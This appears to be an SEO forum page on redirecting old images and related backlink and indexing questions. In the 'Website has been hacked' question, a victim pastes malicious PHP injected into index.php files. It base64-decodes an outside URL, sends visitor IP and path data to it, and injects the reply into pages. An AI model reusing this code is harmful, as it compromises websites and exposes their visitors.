Image redirection: Will it help or hurt?
-
Hi all,
Our website has some old images (no longer existing) that have backlinks. We would like to redirect them to live images to reclaim those backlinks. Is this okay, or will it look suspicious to Google?
Thanks
-
Hi there,
The fewer 301s from external sources, the better. The situation with 301s is this: page A links to page B, but page B is redirected to page C (your page). If you remove the middle step (page B), you won't lose as much link juice, and you will make it easier for the crawler as well. Reach out to the webmasters of the websites you have backlinks from (pages A) and try to convince them to link directly to page C instead of page B.
Hope this helps. If you have any other questions, let me know. Cheers, Martin
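To see why the extra hop matters, here is a small, hypothetical sketch (plain Python, made-up URLs) that resolves a redirect map and counts the hops a crawler has to follow:

```python
def resolve(redirects, url, max_hops=10):
    """Follow a redirect map {old_url: new_url} and return
    (final_url, hops). Stops at max_hops to avoid redirect loops."""
    hops = 0
    while url in redirects and hops < max_hops:
        url = redirects[url]
        hops += 1
    return url, hops

# Hypothetical example: page B (the dead image URL) redirects to page C.
redirects = {
    "https://example.com/old-image.jpg": "https://example.com/new-image.jpg",
}

# A crawler following a backlink to page B needs one extra hop:
print(resolve(redirects, "https://example.com/old-image.jpg"))
# -> ('https://example.com/new-image.jpg', 1)

# If the linking site updates its link to point at page C directly:
print(resolve(redirects, "https://example.com/new-image.jpg"))
# -> ('https://example.com/new-image.jpg', 0)
```

Zero hops is the goal Martin describes: the external link lands directly on the live page.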
-
Hi Martin,
I've had a question about 301s on my mind for a long time. We avoid 301 redirects internally so they don't slow down page loading. What about 301 redirects for links referred from external sources? I mean, page A has been mentioned on an external website, and page A is redirected to page B?
-
Hi there,
Well, with redirects you will lose some amount of the link juice, but not really a lot (roughly 1 to 10%).
However, try to convince the admins of those sites to change the URLs to the new ones. It's always better to avoid 301s if you can.
Cheers, Martin
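If each 301 really does cost on the order of 1 to 10% (Martin's rough figure above; Google publishes no exact number), then the loss compounds per hop in a chain, which is another argument for keeping chains short. A back-of-the-envelope sketch, assuming a fixed fractional loss at each hop (an assumption for illustration, not a published formula):

```python
def equity_after(hops, loss_per_hop):
    """Fraction of link equity surviving a chain of `hops` 301s,
    assuming a fixed fractional loss at every hop."""
    return (1 - loss_per_hop) ** hops

# One hop at a 5% loss keeps 95%; three chained hops keep only ~85.7%.
print(round(equity_after(1, 0.05), 3))  # 0.95
print(round(equity_after(3, 0.05), 3))  # 0.857
```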
-
You can redirect all the images to a new path. It will not hurt you.
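For the original question, a single pattern rule is usually enough. A sketch in Apache .htaccess terms (the paths and domain are hypothetical; adjust to your own structure), assuming mod_alias is available:

```
# 301 old image URLs to their new location, keeping the filename:
# /old-images/foo.jpg -> /images/foo.jpg
RedirectMatch 301 ^/old-images/(.*)$ https://www.example.com/images/$1

# Or, if the old files have no one-to-one replacement, send every
# retired image to a single relevant live image:
# RedirectMatch 301 ^/old-images/.*\.(jpe?g|png|gif)$ https://www.example.com/images/placeholder.jpg
```

Redirecting to a closely related live image preserves relevance; redirecting everything to an unrelated page is what tends to look suspicious.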
Related Questions
-
Inbound Links - Redirect, Leave Alone, etc.
Hi, I recently downloaded the inbound links report for my client to look for some opportunities. When they switched to our platform a couple of years ago, the format of some of their webpages changed, so a number of these inbound links are going to an error page and should be redirected. However, some of these are spammy. In that case, someone recommended that I disavow them but still redirect anyway. In other cases, some were "last seen" a year or two ago, so when I try to go to the URL the link is coming from, I also get an error page. Should I bother to redirect in these cases? Should I disavow in both cases? Or leave them alone? Thanks for any input!
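For the spammy subset, the disavow file Google Search Console accepts is a plain UTF-8 text file with one URL or `domain:` entry per line and `#` comments. A hypothetical example (made-up domains, for illustration only):

```
# Spammy links pointing at retired URLs; the 301s stay in place anyway.
# Disavow an entire domain:
domain:spammy-example-site.com
# Disavow a single page:
http://another-example.com/cheap-links.html
```

Disavowing and redirecting are independent: the disavow file tells Google to ignore the link, while the 301 handles any real visitors who still click it.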
White Hat / Black Hat SEO | AliMac261 -
Backlink Indexing - will this technique hurt or help?
So I came across this idea on YouTube: indexing your backlinks. I understand it's not enough to just have Google crawl your pages - you want them indexed. So, if you create backlinks on, say, a blog or social profile, will it benefit you to have them submitted to other popular blogs, news/PR sites, and video channels - which may be unrelated - for the sole purpose of getting them not just crawled but indexed? There are SEO companies I have seen that claim they do exactly that (publish your backlinks all over the web, making backlinks for backlinks), but in reality is this a good thing or a bad thing? Could this help rankings or hurt them?
White Hat / Black Hat SEO | momentum_technology_services0 -
I'm seeing thousands of no-follow links on spam sites. Can you help figure it out?
I noticed that we are receiving thousands of links from many different sites that are obviously disguised as something else. The strange part is that some of them are legitimate sites when you go to the root. I would say 99% of the page titles read something like: 1 Hour Loan Approval No Credit Check Vermont, go cash advance - africanamericanadaa.com. Can someone please help me? Here are some of the URLs we are looking at: http://africanamericanadaa.com/genialt/100-dollar-loans-for-people-with-no-credit-colorado.html http://muratmakara.com/sickn/index.php?recipe-for-cone-06-crackle-glaze http://semtechblog.com/tacoa/index.php?chilis-blue-raspberry-margarita http://wesleygcook.com/rearc/guaranteed-personal-loans-oregon.html
White Hat / Black Hat SEO | TicketCity0 -
How did I get over 1,000 backlinks in less than a month? Help?
Hi guys, I'm a newbie and just started my website, and I'm wondering if I'm reading this correctly. I use a tool called My SEO Tools, and it's telling me my website zenory.co.nz has over 1,600 backlinks. This is scary, since the site is only 5 months old and I didn't see this until today, even though I check my site's backlinks on a regular basis. However, when I check with Moz, it says I only have 2? I'm a little confused. Any advice here? Much appreciated. Thanks
White Hat / Black Hat SEO | edward-may0 -
Redirecting from HTTPS to HTTP - will it pass the whole link juice to the new HTTP website pages?
Hi, if I make a permanent 301 redirect from HTTPS to HTTP, will it pass the whole link juice to the new HTTP website pages?
White Hat / Black Hat SEO | Aman_1230 -
Website has been hacked - will this hurt ranking?
Today we found out that a website of ours has been hacked and that they put this code in multiple index.php files:

if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'yahoo') == false) && (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false) && (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false) && (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false) && (strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create bot analitics
            $stCurlLink = base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init($stCurlLink);
        }
    }
    if ($stCurlHandle !== NULL)
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0] == "O")
        {
            $sResult[0] = " ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

After some searching I found other people mentioning this problem too. They were also talking about this possibly having an impact on your search rankings. My first question: will this hurt my rankings? Second question: is there something I can do to tell the search engines about the hack so that we don't lose ranking over this? Grtz, Ard0 -
White Hat / Black Hat SEO | GTGshops
Redesign Troubleshooting Help
We launched a redesign at the end of May and soon after, our website was de-indexed from Google. Here are the changes that I have implemented so far to try to fix this issue:
1. 301 redirect chain - We changed all our URLs and implemented 301 redirects. However, these were multiple redirects, meaning one URL redirects to a second and then a third. I was told that this could confuse Google. For example: http://cncahealth.com 301s to http://www.cncahealth.com, which 301s to https://www.cncahealth.com. We wrote a rule for each variation of the URL, so now there is only a one-to-one 301 redirect, and this was validated with urivalet.com.
2. Canonical tags did not match URL - We created the new website in a CMS that generated non-SEO-friendly URLs. We applied 301 redirects to those CMS URLs, but when we enable canonical tags within the CMS, it uses the original CMS URL and not the URL of the page, so the canonical URL doesn't match the page. For now, I disabled canonical tags until I can figure out a way to manually insert canonical tag code in the pages without using the CMS canonical tag feature.
After these two fixes, our website still doesn't seem to get re-indexed by Google, even when I submit the sitemap in Google Webmaster Tools - the sitemap doesn't get indexed. There are two more concerns that I am hoping can be answered in this community:
3. Cache-Control = private - I saw from urivalet.com that our Cache-Control header is set to private. Is this affecting us being indexed, and should it be set to public?
4. Load balancer - Our old website was not on a load balancer, but our new website is. When I look at servers in our analytics, I notice that the site is being picked up on one server and then another at different times. Is Google seeing the same thing, and is the load balancer confusing Google? I'm not sure what else could be an issue with us not being indexed.
Maybe it's just a waiting game where, having implemented changes 1 and 2, I just have to wait - or do 3 and 4, or other issues, also need to be addressed in order to get re-indexed? I hope someone can help me. Thanks!
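The chain in point 1 can typically be collapsed into a single hop with one combined rule. A sketch in Apache terms (assuming mod_rewrite; the domain comes from the question above):

```
# Collapse scheme + host variations into ONE 301 hop:
# http://cncahealth.com, http://www.cncahealth.com, and
# https://cncahealth.com all go straight to https://www.cncahealth.com
RewriteEngine On
RewriteCond %{HTTPS} off [OR]
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule ^(.*)$ https://www.cncahealth.com/$1 [R=301,L]
```

Because the two conditions are OR'd, any request that is either non-HTTPS or non-www is rewritten directly to the final URL, instead of fixing the host in one redirect and the scheme in a second.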
White Hat / Black Hat SEO | rexjoec0 -
Buying a website and redirecting everything
We are considering purchasing an existing website in our industry with a domain authority of 52 and 20K inlinks, and redirecting it to our new website, which has a domain authority of 26 and 1,000 inlinks. Would this be the best way to improve our new site's authority and inlinks? Would Google penalize us for doing that, or would it effectively transfer the old site's authority to us?
White Hat / Black Hat SEO | pbhatt0